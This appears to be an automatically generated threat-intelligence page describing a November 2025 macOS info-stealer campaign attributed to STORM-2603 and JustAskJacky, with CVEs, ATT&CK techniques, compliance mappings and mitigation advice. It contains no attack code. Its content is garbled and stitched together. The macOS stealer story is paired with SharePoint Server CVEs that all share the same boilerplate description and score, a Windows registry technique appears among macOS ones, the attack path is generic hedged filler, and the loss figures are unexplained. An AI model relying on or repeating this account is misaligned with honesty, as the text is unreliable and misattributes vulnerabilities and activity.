Inside the STORM-2603 & JustAskJacky Multi-Vector macOS Stealer Campaign
Executive Summary
In November 2025, a sophisticated multi-vector cyber campaign targeted macOS users, leveraging a cluster of new information stealers and advanced lateral movement techniques. Threat actors, prominently STORM-2603 and JustAskJacky, exploited vulnerabilities in east-west traffic controls and manipulated encrypted traffic in hybrid cloud environments to evade detection. Utilizing covert remote-access tools and exploiting hybrid connectivity pathways, the attackers exfiltrated sensitive business and personal data—including credentials and intellectual property—before security teams were alerted. The coordinated attack spanned several organizations, resulting in notable data leaks and operational disruption.
This incident highlights the growing trend of high-performance, cross-platform info-stealing malware and the convergence of cloud, on-prem, and user device threats. Security leaders should note the increased adoption of identity-based policy enforcement, robust segmentation, and enhanced anomaly detection to counter similar campaigns now escalating in prevalence.
Why This Matters Now
MacOS is increasingly targeted by organized threat groups as enterprise cloud and hybrid environments expand, leading to a surge in sophisticated, multi-cloud attack techniques. The rapid evolution of info-stealers and the abuse of east-west and encrypted traffic makes traditional perimeter defenses insufficient, demanding immediate investment in modern segmentation and visibility solutions.
Attack Path Analysis
The attacker initiated the campaign via plausibly compromised credentials or a vulnerable externally available service, gaining initial access to the cloud environment. Once inside, they escalated privileges through role manipulation or token compromise. The adversary then moved laterally across network segments, including container or Kubernetes clusters, to discover sensitive workloads. Using covert channels, they established command and control to issue instructions and maintain persistence. Data was exfiltrated from the environment via unauthorized outbound channels, possibly leveraging unmonitored egress paths. The campaign resulted in impact such as data theft, disruption, or ransomware deployment, affecting business operations.
Kill Chain Progression
Initial Compromise
Description
Adversary obtained access by exploiting internet-exposed services or stolen cloud credentials, likely via phishing or unpatched vulnerabilities.
Related CVEs
CVE-2025-49704
CVSS 9.8An unspecified vulnerability in Microsoft SharePoint Server allows remote attackers to execute arbitrary code via unknown vectors.
Affected Products:
Microsoft SharePoint Server – 2019, 2016, 2013
Exploit Status:
exploited in the wildCVE-2025-49706
CVSS 9.8An unspecified vulnerability in Microsoft SharePoint Server allows remote attackers to execute arbitrary code via unknown vectors.
Affected Products:
Microsoft SharePoint Server – 2019, 2016, 2013
Exploit Status:
exploited in the wildCVE-2025-53770
CVSS 9.8An unspecified vulnerability in Microsoft SharePoint Server allows remote attackers to execute arbitrary code via unknown vectors.
Affected Products:
Microsoft SharePoint Server – 2019, 2016, 2013
Exploit Status:
exploited in the wildCVE-2025-53771
CVSS 9.8An unspecified vulnerability in Microsoft SharePoint Server allows remote attackers to execute arbitrary code via unknown vectors.
Affected Products:
Microsoft SharePoint Server – 2019, 2016, 2013
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Phishing
User Execution
Command and Scripting Interpreter: AppleScript
Boot or Logon Autostart Execution: Login Items
Deobfuscate/Decode Files or Information
Modify Registry
Credentials from Password Stores: Keychain
Exfiltration Over Web Service
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Strong Access Control Measures
Control ID: 8.3.1
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management Framework
Control ID: Article 9
CISA ZTMM 2.0 – Identity Policy Enforcement
Control ID: Identity Pillar - Policy Enforcement
NIS2 Directive – Technical and Organisational Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
Multi-vector campaigns targeting macOS systems pose critical risks to encrypted traffic, zero trust segmentation, and threat detection capabilities in financial institutions.
Health Care / Life Sciences
HIPAA compliance vulnerabilities exposed through east-west traffic security gaps and anomaly detection failures against STORM-2603 and macOS stealer campaigns.
Information Technology/IT
Cloud native security fabric and Kubernetes security directly threatened by multi-vector attacks exploiting egress security weaknesses and lateral movement capabilities.
Government Administration
Critical infrastructure vulnerabilities in hybrid connectivity and multicloud visibility exposed to sophisticated threat actors deploying macOS stealers and advanced persistent threats.
Sources
- Here’s what you missed on Office Hours: November 2025https://redcanary.com/blog/security-operations/office-hours-november-2025/Verified
- Inside The ToolShell Campaignhttps://www.fortinet.com/blog/threat-research/inside-the-toolshell-campaignVerified
- Microsoft SharePoint Zero-day Attackhttps://www.fortiguard.com/outbreak-alert/microsoft-sharepoint-zero-dayVerified
- China-backed Storm-2603 deployed ransomware via SharePoint zero-dayshttps://www.scworld.com/news/microsoft-china-backed-storm-2603-deploys-warlock-ransomware-on-sharepoint-serversVerified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust segmentation, network policy enforcement, and egress controls provided by the Cloud Network Security Framework could have restricted unauthorized lateral movement and data exfiltration, while high-fidelity visibility and anomaly detection would enable rapid threat detection and mitigation across the kill chain.
Control: Zero Trust Segmentation
Mitigation: Prevents unauthorized access to critical infrastructure endpoints.
Control: Threat Detection & Anomaly Response
Mitigation: Detects and alerts on suspicious privilege escalation attempts.
Control: East-West Traffic Security
Mitigation: Blocks unauthorized workload-to-workload or pod-to-pod communication.
Control: Inline IPS (Suricata)
Mitigation: Blocks and detects known malicious C2 patterns in network traffic.
Control: Egress Security & Policy Enforcement
Mitigation: Prevents or alerts on unsanctioned outbound data transfers.
Enables rapid containment and limits operational impact.
Impact at a Glance
Affected Business Functions
- Document Management
- Collaboration Platforms
- Internal Communications
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive corporate documents and internal communications due to unauthorized access to SharePoint servers.
Recommended Actions
Key Takeaways & Next Steps
- • Enforce zero trust segmentation and least-privilege access to restrict initial entry and lateral movement.
- • Implement real-time anomaly detection and threat response to catch and contain privilege escalation and C2 activity.
- • Apply strict egress filtering and inline IPS to identify and block data exfiltration attempts.
- • Leverage Kubernetes and east-west firewalling to isolate workloads and prevent lateral attack paths.
- • Centralize multi-cloud visibility and automate policy enforcement for rapid containment during active threats.
